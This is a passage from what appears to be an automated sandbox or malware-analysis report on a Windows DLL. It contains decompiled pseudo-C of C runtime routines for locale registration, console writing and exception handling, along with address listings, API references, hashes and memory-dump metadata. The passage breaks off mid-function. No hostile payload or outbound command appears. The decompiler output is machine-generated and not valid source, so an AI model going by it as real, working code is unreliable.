																																																_push( *((intOrPtr*)(_t682 + 8)));
																																																_push(_t682 - 0x10);
																																																__eflags = E6D49162A(_t482, _t583, _t633, _t649, _t665) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	_t587 = _t682 - 0x20;
																																																	E6D461438(_t587);
																																																	E6D4A3D74(_t682 - 0x20, 0x6d543504);
																																																	asm("int3");
																																																	E6D4A00AC(0x6d4e851f, _t482, _t649, _t665, 4);
																																																	_t666 = _t587;
																																																	 *(_t682 - 0x10) = _t666;
																																																	 *((intOrPtr*)(_t666 + 4)) =  *((intOrPtr*)(_t682 + 0xc));
																																																	_push( *((intOrPtr*)(_t682 + 0x14)));
																																																	_t217 = _t682 - 4;
																																																	 *_t217 =  *(_t682 - 4) & 0x00000000;
																																																	__eflags =  *_t217;
																																																	 *_t666 = 0x6d4ec0c4;
																																																	 *((char*)(_t666 + 0x28)) =  *((intOrPtr*)(_t682 + 0x10));
																																																	E6D49542F(_t482, _t587, _t633, _t649, _t666,  *_t217);
																																																	return E6D4A0075(_t666,  *((intOrPtr*)(_t682 + 8)));
																																																} else {
																																																	_t649 =  *(_t682 - 0x10);
																																																	 *(_t682 - 0x10) = _t649;
																																																	 *(_t682 - 4) = 1;
																																																	E6D486FD3(__eflags, _t649);
																																																	 *0x6d4ea26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t649 + 4))))();
																																																	 *0x6d546dd0 = _t649;
																																																	goto L103;
																																																}
																																															} else {
																																																_t649 = _t665;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t648 =  *(_t682 - 0x10);
																																														 *(_t682 - 0x10) = _t648;
																																														 *(_t682 - 4) = 1;
																																														E6D486FD3(__eflags, _t648);
																																														 *0x6d4ea26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t648 + 4))))();
																																														 *0x6d546e00 = _t648;
																																														goto L96;
																																													}
																																												} else {
																																													_t648 = _t664;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t647 =  *(_t682 - 0x10);
																																											 *(_t682 - 0x10) = _t647;
																																											 *(_t682 - 4) = 1;
																																											E6D486FD3(__eflags, _t647);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t647 + 4))))();
																																											 *0x6d546dcc = _t647;
																																											goto L89;
																																										}
																																									} else {
																																										_t647 = _t663;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t646 =  *(_t682 - 0x10);
																																								 *(_t682 - 0x10) = _t646;
																																								 *(_t682 - 4) = 1;
																																								E6D486FD3(__eflags, _t646);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t646 + 4))))();
																																								 *0x6d546dfc = _t646;
																																								goto L82;
																																							}
																																						} else {
																																							_t646 = _t662;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t645 =  *(_t682 - 0x10);
																																					 *(_t682 - 0x10) = _t645;
																																					 *(_t682 - 4) = 1;
																																					E6D486FD3(__eflags, _t645);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t645 + 4))))();
																																					 *0x6d546de0 = _t645;
																																					goto L75;
																																				}
																																			} else {
																																				_t645 = _t661;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t644 =  *(_t682 - 0x10);
																																		 *(_t682 - 0x10) = _t644;
																																		 *(_t682 - 4) = 1;
																																		E6D486FD3(__eflags, _t644);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t644 + 4))))();
																																		 *0x6d546ddc = _t644;
																																		goto L68;
																																	}
																																} else {
																																	_t644 = _t660;
																																	goto L68;
																																}
																															}
																														} else {
																															_t643 =  *(_t682 - 0x10);
																															 *(_t682 - 0x10) = _t643;
																															 *(_t682 - 4) = 1;
																															E6D486FD3(__eflags, _t643);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t643 + 4))))();
																															 *0x6d546db0 = _t643;
																															goto L61;
																														}
																													} else {
																														_t643 = _t659;
																														goto L61;
																													}
																												}
																											} else {
																												_t642 =  *(_t682 - 0x10);
																												 *(_t682 - 0x10) = _t642;
																												 *(_t682 - 4) = 1;
																												E6D486FD3(__eflags, _t642);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t642 + 4))))();
																												 *0x6d546dd8 = _t642;
																												goto L54;
																											}
																										} else {
																											_t642 = _t658;
																											goto L54;
																										}
																									}
																								} else {
																									_t641 =  *(_t682 - 0x10);
																									 *(_t682 - 0x10) = _t641;
																									 *(_t682 - 4) = 1;
																									E6D486FD3(__eflags, _t641);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t641 + 4))))();
																									 *0x6d546dc4 = _t641;
																									goto L47;
																								}
																							} else {
																								_t641 = _t657;
																								goto L47;
																							}
																						}
																					} else {
																						_t640 =  *(_t682 - 0x10);
																						 *(_t682 - 0x10) = _t640;
																						 *(_t682 - 4) = 1;
																						E6D486FD3(__eflags, _t640);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t640 + 4))))();
																						 *0x6d546dc8 = _t640;
																						goto L40;
																					}
																				} else {
																					_t640 = _t656;
																					goto L40;
																				}
																			}
																		} else {
																			_t639 =  *(_t682 - 0x10);
																			 *(_t682 - 0x10) = _t639;
																			 *(_t682 - 4) = 1;
																			E6D486FD3(__eflags, _t639);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t639 + 4))))();
																			 *0x6d546df4 = _t639;
																			goto L33;
																		}
																	} else {
																		_t639 = _t655;
																		goto L33;
																	}
																}
															} else {
																_t638 =  *(_t682 - 0x10);
																 *(_t682 - 0x10) = _t638;
																 *(_t682 - 4) = 1;
																E6D486FD3(__eflags, _t638);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t638 + 4))))();
																 *0x6d546df8 = _t638;
																goto L26;
															}
														} else {
															_t638 = _t654;
															goto L26;
														}
													}
												} else {
													_t637 =  *(_t682 - 0x10);
													 *(_t682 - 0x10) = _t637;
													 *(_t682 - 4) = 1;
													E6D486FD3(__eflags, _t637);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t637 + 4))))();
													 *0x6d546dc0 = _t637;
													goto L19;
												}
											} else {
												_t637 = _t653;
												goto L19;
											}
										}
									} else {
										_t636 =  *(_t682 - 0x10);
										 *(_t682 - 0x10) = _t636;
										 *(_t682 - 4) = 1;
										E6D486FD3(__eflags, _t636);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t636 + 4))))();
										 *0x6d546df0 = _t636;
										goto L12;
									}
								} else {
									_t636 = _t652;
									goto L12;
								}
							}
						} else {
							_t635 =  *(_t682 - 0x10);
							 *(_t682 - 0x10) = _t635;
							 *(_t682 - 4) = 1;
							E6D486FD3(__eflags, _t635);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t635 + 4))))();
							 *0x6d546dbc = _t635;
							goto L5;
						}
					} else {
						_t635 = _t651;
						goto L5;
					}
				}
			}

0x6d48f375
0x6d48f375
0x6d48f37c
0x6d48f386
0x6d48f38b
0x6d48f396
0x6d48f39a
0x6d48f39d
0x6d48f3a2
0x6d48f3a6
0x6d48f3ab
0x6d48f3af
0x6d48f3f4
0x6d48f3f7
0x6d48f403
0x6d48f3b1
0x6d48f3b3
0x6d48f3b9
0x6d48f3bf
0x6d48f3c7
0x6d48f3ca
0x6d48f407
0x6d48f415
0x6d48f41a
0x6d48f422
0x6d48f42c
0x6d48f431
0x6d48f43c
0x6d48f440
0x6d48f443
0x6d48f448
0x6d48f451
0x6d48f453
0x6d48f455
0x6d48f49a
0x6d48f49d
0x6d48f4a9
0x6d48f457
0x6d48f457
0x6d48f459
0x6d48f45f
0x6d48f465
0x6d48f46d
0x6d48f470
0x6d48f4ad
0x6d48f4bb
0x6d48f4c0
0x6d48f4c8
0x6d48f4d2
0x6d48f4d7
0x6d48f4e2
0x6d48f4e6
0x6d48f4e9
0x6d48f4ee
0x6d48f4f7
0x6d48f4f9
0x6d48f4fb
0x6d48f540
0x6d48f543
0x6d48f54f
0x6d48f4fd
0x6d48f4fd
0x6d48f4ff
0x6d48f505
0x6d48f50b
0x6d48f513
0x6d48f516
0x6d48f553
0x6d48f561
0x6d48f566
0x6d48f56e
0x6d48f578
0x6d48f57d
0x6d48f588
0x6d48f58c
0x6d48f58f
0x6d48f594
0x6d48f59d
0x6d48f59f
0x6d48f5a1
0x6d48f5e6
0x6d48f5e9
0x6d48f5f5
0x6d48f5a3
0x6d48f5a3
0x6d48f5a5
0x6d48f5ab
0x6d48f5b1
0x6d48f5b9
0x6d48f5bc
0x6d48f5f9
0x6d48f607
0x6d48f60c
0x6d48f614
0x6d48f61e
0x6d48f623
0x6d48f62e
0x6d48f632
0x6d48f635
0x6d48f63a
0x6d48f643
0x6d48f645
0x6d48f647
0x6d48f68c
0x6d48f68f
0x6d48f69b
0x6d48f649
0x6d48f649
0x6d48f64b
0x6d48f651
0x6d48f657
0x6d48f65f
0x6d48f662
0x6d48f69f
0x6d48f6ad
0x6d48f6b2
0x6d48f6ba
0x6d48f6c4
0x6d48f6c9
0x6d48f6d4
0x6d48f6d8
0x6d48f6db
0x6d48f6e0
0x6d48f6e9
0x6d48f6eb
0x6d48f6ed
0x6d48f732
0x6d48f735
0x6d48f741
0x6d48f6ef
0x6d48f6ef
0x6d48f6f1
0x6d48f6f7
0x6d48f6fd
0x6d48f705
0x6d48f708
0x6d48f745
0x6d48f753
0x6d48f758
0x6d48f760
0x6d48f76a
0x6d48f76f
0x6d48f77a
0x6d48f77e
0x6d48f781
0x6d48f786
0x6d48f78f
0x6d48f791
0x6d48f793
0x6d48f7d8
0x6d48f7db
0x6d48f7e7
0x6d48f795
0x6d48f795
0x6d48f797
0x6d48f79d
0x6d48f7a3
0x6d48f7ab
0x6d48f7ae
0x6d48f7eb
0x6d48f7f9
0x6d48f7fe
0x6d48f806
0x6d48f810
0x6d48f815
0x6d48f820
0x6d48f824
0x6d48f827
0x6d48f82c
0x6d48f835
0x6d48f837
0x6d48f839
0x6d48f87e
0x6d48f881
0x6d48f88d
0x6d48f83b
0x6d48f83b
0x6d48f83d
0x6d48f843
0x6d48f849
0x6d48f851
0x6d48f854
0x6d48f891
0x6d48f89f
0x6d48f8a4
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8db
0x6d48f8dd
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3
0x6d48f856
0x6d48f856
0x6d48f859
0x6d48f85d
0x6d48f861
0x6d48f86e
0x6d48f876
0x6d48f878
0x00000000
0x6d48f878
0x6d48f83f
0x6d48f83f
0x00000000
0x6d48f83f
0x6d48f83d
0x6d48f7b0
0x6d48f7b0
0x6d48f7b3
0x6d48f7b7
0x6d48f7bb
0x6d48f7c8
0x6d48f7d0
0x6d48f7d2
0x00000000
0x6d48f7d2
0x6d48f799
0x6d48f799
0x00000000
0x6d48f799
0x6d48f797
0x6d48f70a
0x6d48f70a
0x6d48f70d
0x6d48f711
0x6d48f715
0x6d48f722
0x6d48f72a
0x6d48f72c
0x00000000
0x6d48f72c
0x6d48f6f3
0x6d48f6f3
0x00000000
0x6d48f6f3
0x6d48f6f1
0x6d48f664
0x6d48f664
0x6d48f667
0x6d48f66b
0x6d48f66f
0x6d48f67c
0x6d48f684
0x6d48f686
0x00000000
0x6d48f686
0x6d48f64d
0x6d48f64d
0x00000000
0x6d48f64d
0x6d48f64b
0x6d48f5be
0x6d48f5be
0x6d48f5c1
0x6d48f5c5
0x6d48f5c9
0x6d48f5d6
0x6d48f5de
0x6d48f5e0
0x00000000
0x6d48f5e0
0x6d48f5a7
0x6d48f5a7
0x00000000
0x6d48f5a7
0x6d48f5a5
0x6d48f518
0x6d48f518
0x6d48f51b
0x6d48f51f
0x6d48f523
0x6d48f530
0x6d48f538
0x6d48f53a
0x00000000
0x6d48f53a
0x6d48f501
0x6d48f501
0x00000000
0x6d48f501
0x6d48f4ff
0x6d48f472
0x6d48f472
0x6d48f475
0x6d48f479
0x6d48f47d
0x6d48f48a
0x6d48f492
0x6d48f494
0x00000000
0x6d48f494
0x6d48f45b
0x6d48f45b
0x00000000
0x6d48f45b
0x6d48f459
0x6d48f3cc
0x6d48f3cc
0x6d48f3cf
0x6d48f3d3
0x6d48f3d7
0x6d48f3e4
0x6d48f3ec
0x6d48f3ee
0x00000000
0x6d48f3ee
0x6d48f3b5
0x6d48f3b5
0x00000000
0x6d48f3b5
0x6d48f3b3

APIs

__EH_prolog3.LIBCMT ref: 6D48F37C
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F386
int.LIBCPMT ref: 6D48F39D

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48F3D7
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F3F7
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F415

Strings

pmTm, xrefs: 6D48F391

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: pmTm
API String ID: 651022567-3886064198
Opcode ID: c18b2909933ff0349ab3223f1cfedafdcbe7ff750e09472b34444943effe59cf
Instruction ID: 379c99acbe6e87ed7c5758b006a77a504d383cd1513084b044e9bbc60a9aa6ba
Opcode Fuzzy Hash: c18b2909933ff0349ab3223f1cfedafdcbe7ff750e09472b34444943effe59cf
Instruction Fuzzy Hash: E011E0768081199BCF01EBA0C844EEDB774AF94314F2A400DD611BB396CB70DE018BE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D2C2B, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6D4D2C2B(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				signed int _t129;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0x6d54506c; // 0x9d44929c
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6d5476f8 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t129 =  *(0x6d5476f8 + _v48 * 4);
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						_t92 = E6D4C367B(_t116, _t129);
						_t129 = 0x8000;
						if(( *(_t92 + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t129 = _v48;
								 *((char*)( *((intOrPtr*)(0x6d5476f8 + _t129 * 4)) + _t116 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x6d5476f8 + _t129 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6d5476f8 + _t129 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E6D4CCF1B( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6D4CCF1B();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6D49F8A5(_v8 ^ _t133, _t129, _t132);
			}

0x6d4d2c33
0x6d4d2c3a
0x6d4d2c3d
0x6d4d2c45
0x6d4d2c49
0x6d4d2c55
0x6d4d2c58
0x6d4d2c5b
0x6d4d2c62
0x6d4d2c6a
0x6d4d2c6d
0x6d4d2c73
0x6d4d2c79
0x6d4d2c7e
0x6d4d2c80
0x6d4d2c83
0x6d4d2c88
0x6d4d2c92
0x6d4d2c99
0x6d4d2c9c
0x6d4d2ca3
0x6d4d2caa
0x6d4d2cc5
0x6d4d2ccd
0x6d4d2cd6
0x6d4d2cfc
0x6d4d2cfe
0x00000000
0x6d4d2cd8
0x6d4d2cdb
0x6d4d2da2
0x6d4d2dae
0x6d4d2db9
0x6d4d2dbe
0x6d4d2ce1
0x6d4d2ce8
0x6d4d2ced
0x6d4d2cf3
0x6d4d2cf9
0x00000000
0x6d4d2cf9
0x6d4d2cf3
0x6d4d2cdb
0x6d4d2cac
0x6d4d2cb0
0x6d4d2cb3
0x6d4d2cb9
0x6d4d2cbb
0x6d4d2cbe
0x6d4d2cc2
0x6d4d2cff
0x6d4d2d02
0x6d4d2d03
0x6d4d2d08
0x6d4d2d0e
0x6d4d2d14
0x6d4d2d23
0x6d4d2d29
0x6d4d2d2f
0x6d4d2d34
0x6d4d2d50
0x6d4d2dc3
0x6d4d2dc9
0x6d4d2d52
0x6d4d2d5a
0x6d4d2d63
0x6d4d2d69
0x00000000
0x6d4d2d6b
0x6d4d2d6d
0x6d4d2d70
0x6d4d2d89
0x00000000
0x6d4d2d8b
0x6d4d2d8f
0x6d4d2d91
0x6d4d2d94
0x00000000
0x6d4d2d94
0x6d4d2d8f
0x6d4d2d89
0x6d4d2d69
0x6d4d2d63
0x6d4d2d50
0x6d4d2d34
0x6d4d2d0e
0x00000000
0x6d4d2d97
0x6d4d2d97
0x6d4d2dcb
0x6d4d2ddd

APIs

GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,6D4D33A0,?,?,00000000,?,?,?), ref: 6D4D2C6D
__fassign.LIBCMT ref: 6D4D2CE8
__fassign.LIBCMT ref: 6D4D2D03
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6D4D2D29
WriteFile.KERNEL32(?,00000000,00000000,6D4D33A0,00000000,?,?,?,?,?,?,?,?,?,6D4D33A0,?), ref: 6D4D2D48
WriteFile.KERNEL32(?,?,00000001,6D4D33A0,00000000,?,?,?,?,?,?,?,?,?,6D4D33A0,?), ref: 6D4D2D81

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: d73e12ebff1f96b96cefd408ea7f4ed25ea31393bda78beb80098c527899b94c
Instruction ID: fd599b62664f49bf0891d8e92750c17d4e2e2a4ad06f9c9984ebfb6a2b1faebf
Opcode Fuzzy Hash: d73e12ebff1f96b96cefd408ea7f4ed25ea31393bda78beb80098c527899b94c
Instruction Fuzzy Hash: 5B5180B1A012499FDB10CFA8C891FEEBBB8EF09310F15415AE965E7281DB30DD51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A3F60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E6D4A3F60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				signed int _t48;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				void* _t66;
				long _t68;
				long _t70;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t83;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				long _t95;
				long _t97;
				void* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t112;

				_t86 = __edx;
				_push(__ebx);
				_t74 = _a8;
				_push(__edi);
				_v5 = 0;
				_t93 = _t74 + 0x10;
				_t48 =  *(_t74 + 8) ^  *0x6d54506c;
				_push(_t93);
				_push(_t48);
				_v16 = 1;
				_v20 = _t93;
				_v12 = _t48;
				E6D4A3F20(_t74, __edx);
				E6D4A5267(_a12);
				_t51 = _a4;
				_t105 = _t104 + 0xc;
				_t90 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						_t86 = 0xfffffffe;
						E6D4A5920(_t74, 0xfffffffe, _t93, 0x6d54506c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t58 * 4));
							_t59 = _t78 + _t58 * 4;
							_t79 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t80 = _v5;
								goto L8;
							} else {
								_t86 = _t93;
								_t60 = E6D4A58D0(_t79, _t93);
								_t80 = 1;
								_v5 = 1;
								_t112 = _t60;
								if(_t112 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									_push(_v12);
									E6D4A3F20(_t74, _t86);
									goto L15;
								} else {
									if(_t112 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6d4ee698;
											if(__eflags != 0) {
												_t70 = E6D4E7400(__eflags, 0x6d4ee698);
												_t105 = _t105 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t97 =  *0x6d4ee698; // 0x6d4a3b1a
